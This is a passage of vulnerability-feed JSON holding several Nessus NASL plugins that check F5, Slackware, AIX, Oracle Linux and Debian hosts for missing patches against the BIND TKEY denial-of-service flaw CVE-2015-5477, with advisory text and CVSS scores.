"cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-01T01:24:14", "bulletinFamily": "scanner", "description": "An error in the handling of TKEY queries can be exploited by an\nattacker for use as a denial-of-service vector, as a constructed\npacket can use the defect to trigger a REQUIRE assertion failure,\ncausing BIND to exit. (CVE-2015-5477)", "modified": "2020-07-02T00:00:00", "id": "F5_BIGIP_SOL16909.NASL", "href": "https://www.tenable.com/plugins/nessus/86011", "published": "2015-09-18T00:00:00", "title": "F5 Networks BIG-IP : BIND vulnerability (K16909)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K16909.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86011);\n script_version(\"2.8\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"F5 Networks BIG-IP : BIND vulnerability (K16909)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An error in the handling of TKEY queries can be exploited by an\nattacker for use as a denial-of-service vector, as a constructed\npacket can use the defect to trigger a REQUIRE assertion failure,\ncausing BIND to exit. (CVE-2015-5477)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K16909\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K16909.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K16909\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.3.0-11.5.3\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.4.0-11.5.3\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\",\"11.2.1HF15\",\"10.2.4HF12\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\",\"11.2.1HF15\",\"10.2.4HF12\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.3\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\",\"11.2.1HF15\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\",\"11.2.1HF15\",\"10.2.4HF12\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\",\"11.2.1HF15\",\"10.2.4HF12\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\",\"11.6.0\",\"11.2.0-11.5.3\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\",\"11.2.1HF15\",\"10.2.4HF12\",\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\",\"11.2.1HF15\",\"11.0.0-11.1.0\",\"10.1.0-10.2.4\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.3.0-11.5.3\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"11.0.0-11.4.1\",\"10.1.0-10.2.4\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"11.4.1HF9\",\"11.2.1HF15\",\"10.2.4HF12\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\",\"10.1.0-10.2.4\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"11.2.1HF15\",\"10.2.4HF12\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\",\"10.1.0-10.2.4\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"11.2.1HF15\",\"10.2.4HF12\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-01T00:54:13", "bulletinFamily": "scanner", "description": "New bind packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, and -current to fix a security issue.", "modified": "2020-07-02T00:00:00", "id": "SLACKWARE_SSA_2015-209-01.NASL", "href": "https://www.tenable.com/plugins/nessus/85043", "published": "2015-07-29T00:00:00", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : bind (SSA:2015-209-01)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2015-209-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85043);\n script_version(\"$Revision: 2.8 $\");\n script_cvs_date(\"$Date: 2015/09/13 04:38:19 $\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"SSA\", value:\"2015-209-01\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : bind (SSA:2015-209-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New bind packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, and -current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.554472\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eb5b6b3c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"bind\", pkgver:\"9.10.2_P3\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.10.2_P3\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-01T00:57:31", "bulletinFamily": "scanner", "description": "ISC BIND is vulnerable to a denial of service, caused by an error in\nthe handling of TKEY queries. By sending specially-crafted packets, a\nremote attacker could exploit this vulnerability to cause a REQUIRE\nassertion failure.", "modified": "2020-07-02T00:00:00", "id": "AIX_IV75966.NASL", "href": "https://www.tenable.com/plugins/nessus/85450", "published": "2015-08-18T00:00:00", "title": "AIX 5.3 TL 12 : bind9 (IV75966)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory bind9_advisory8.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85450);\n script_version(\"$Revision: 2.4 $\");\n script_cvs_date(\"$Date: 2015/09/13 04:38:19 $\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"AIX 5.3 TL 12 : bind9 (IV75966)\");\n script_summary(english:\"Check for APAR IV75966\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"ISC BIND is vulnerable to a denial of service, caused by an error in\nthe handling of TKEY queries. By sending specially-crafted packets, a\nremote attacker could exploit this vulnerability to cause a REQUIRE\nassertion failure.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"5.3\", ml:\"12\", sp:\"09\", patch:\"IV75966s9a\", package:\"bos.net.tcp.client\", minfilesetver:\"5.3.12.0\", maxfilesetver:\"5.3.12.10\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:aix_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-01T03:41:00", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2015:1515 :\n\nUpdated bind97 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling the update, the BIND daemon (named) will be restarted\nautomatically.", "modified": "2020-07-02T00:00:00", "id": "ORACLELINUX_ELSA-2015-1515.NASL", "href": "https://www.tenable.com/plugins/nessus/85117", "published": "2015-07-30T00:00:00", "title": "Oracle Linux 5 : bind97 (ELSA-2015-1515)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:1515 and \n# Oracle Linux Security Advisory ELSA-2015-1515 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85117);\n script_version(\"2.12\");\n script_cvs_date(\"Date: 2019/09/27 13:00:36\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"RHSA\", value:\"2015:1515\");\n\n script_name(english:\"Oracle Linux 5 : bind97 (ELSA-2015-1515)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:1515 :\n\nUpdated bind97 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling the update, the BIND daemon (named) will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-July/005225.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bind97 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind97\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind97-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind97-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind97-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind97-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"bind97-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind97-chroot-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind97-devel-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind97-libs-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind97-utils-9.7.0-21.P2.el5_11.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind97 / bind97-chroot / bind97-devel / bind97-libs / bind97-utils\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-03-17T22:58:58", "bulletinFamily": "scanner", "description": "Jonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering\nan assertion failure and causing BIND to exit.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "modified": "2015-07-29T00:00:00", "id": "DEBIAN_DLA-285.NASL", "href": "https://www.tenable.com/plugins/nessus/85052", "published": "2015-07-29T00:00:00", "title": "Debian DLA-285-1 : bind9 security update", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-285-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85052);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/12\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"Debian DLA-285-1 : bind9 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering\nan assertion failure and causing BIND to exit.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/07/msg00023.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/bind9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n 